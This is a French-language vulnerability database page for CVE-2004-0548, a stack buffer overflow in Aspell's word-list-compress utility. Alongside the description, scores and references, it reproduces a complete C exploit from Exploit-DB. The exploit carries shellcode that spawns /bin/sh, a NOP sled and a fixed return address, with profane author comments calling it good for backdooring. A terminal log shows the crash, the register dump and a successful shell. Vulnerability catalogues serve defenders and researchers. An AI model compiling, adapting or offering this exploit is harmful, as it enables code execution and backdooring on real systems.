CVE-2004-0548 : Détail

CVE-2004-0548

0.04%V3
Local
2004-06-11
02h00 +00:00
2016-11-25
18h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Multiple stack-based buffer overflows in the word-list-compress functionality in compress.c for Aspell allow local users to execute arbitrary code via a long entry in the wordlist that is not properly handled when using the (1) "c" compress option or (2) "d" decompress option.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 669

Date de publication : 2004-11-30 23h00 +00:00
Auteur : c0d3r
EDB Vérifié : Yes

/* Fuck private exploits . Fuck iranian hacking (and security !!) teams who are just some fucking kiddies. Fuck all "Security money makers" word-list-compress local exploit - SECU Coded by : c0d3r / root . razavi1366[at]yahoo[dot]com word-list-compress is not setuid . so good for backdooring . gratz fly to : LorD - NT - sIiiS - vbehzadan - hyper sec members. we are : LorD - c0d3r - NT ; irc.persiairc.com 6667 #ihs */ #include<stdio.h> #include<stdlib.h> #define NOP 0x90 #define address 0xbffff2b8 #define size 350 unsigned long get_sp(void) { __asm__("movl %esp, %eax"); } int main() { char shellcode[] = /* 37 bytes shellcode written by myself */ "\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c" "\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff" "\xff/bin/sh"; char exploit[size] ; char *ptr; long *addr_ptr; char test[300]; long addr; int NL= 180 ; int i ; int x=0 ; ptr = exploit; addr_ptr = (long *) ptr; for(i=0;i < size;i+=4){ *(addr_ptr++) = address; } for(i=0 ; i < NL ; i++ ) { exploit[i] = NOP; } if(shellcode != NULL){ while(x != strlen(shellcode)){ exploit[NL] = shellcode[x]; NL+=1;x+=1; } } exploit[size] = 0x00; printf("word-list-compress local exploit by root / c0d3r\n"); printf("stack pointer: 0x%x\n", get_sp()); printf("using return address : 0x%x\n", address); printf("using %d bytes shellcode\n", sizeof(shellcode)); setenv("exploit", exploit, 1); putenv(exploit); printf("exploit string loaded into the enviroment\n"); system("echo $exploit | word-list-compress c"); return 0; } /* root@darkstar:/sploits# word-list-compress Compresses or uncompresses sorted word lists. For best result the locale should be set to C before sorting by setting the environmental variable LANG to "C" before sorting. Copyright 2001 by Kevin Atkinson. Usage: word-list-compress c[ompress]|d[ecompress] root@darkstar:/sploits# ************************************************************ root@darkstar:/sploits# echo `perl -e 'print "A"x300'` | word-list-compress c Segmentation fault (core dumped) root@darkstar:/sploits# gdb -c core GNU gdb 6.1.1 Copyright 2004 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i486-slackware-linux". Core was generated by `word-list-compress c'. Program terminated with signal 11, Segmentation fault. #0 0x41414141 in ?? () (gdb) info registers eax 0x0 0 ecx 0x40154c20 1075137568 edx 0x0 0 ebx 0x41414141 1094795585 esp 0xbffff560 0xbffff560 ebp 0x41414141 0x41414141 esi 0x41414141 1094795585 edi 0x41414141 1094795585 eip 0x41414141 0x41414141 eflags 0x210246 2163270 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x2b 43 ---Type <return> to continue, or q <return> to quit--- ********************************************************** root@darkstar:/sploits# gcc word-list-compress.c -o word-list-compress word-list-compress.c:65:2: warning: no newline at end of file root@darkstar:/sploits# ./word-list-compress word-list-compress local exploit by root / c0d3r stack pointer: 0xbffff268 using return address : 0xbffff2b8 using 37 bytes shellcode exploit string loaded into the enviroment [1 C[C KS /bin/sh sh-2.05b# echo IHS IHS sh-2.05b# ************************************************************ thats all . have fun ! */ // milw0rm.com [2004-12-01]

Products Mentioned

Configuraton 0

Gnu>>Aspell >> Version 0.50.5

Configuraton 0

Gentoo>>Linux >> Version 1.4

Références

http://www.securityfocus.com/bid/10497
Tags : vdb-entry, x_refsource_BID
http://www.gentoo.org/security/en/glsa/glsa-200406-14.xml
Tags : vendor-advisory, x_refsource_GENTOO
http://marc.info/?l=bugtraq&m=108675120224531&w=2
Tags : mailing-list, x_refsource_BUGTRAQ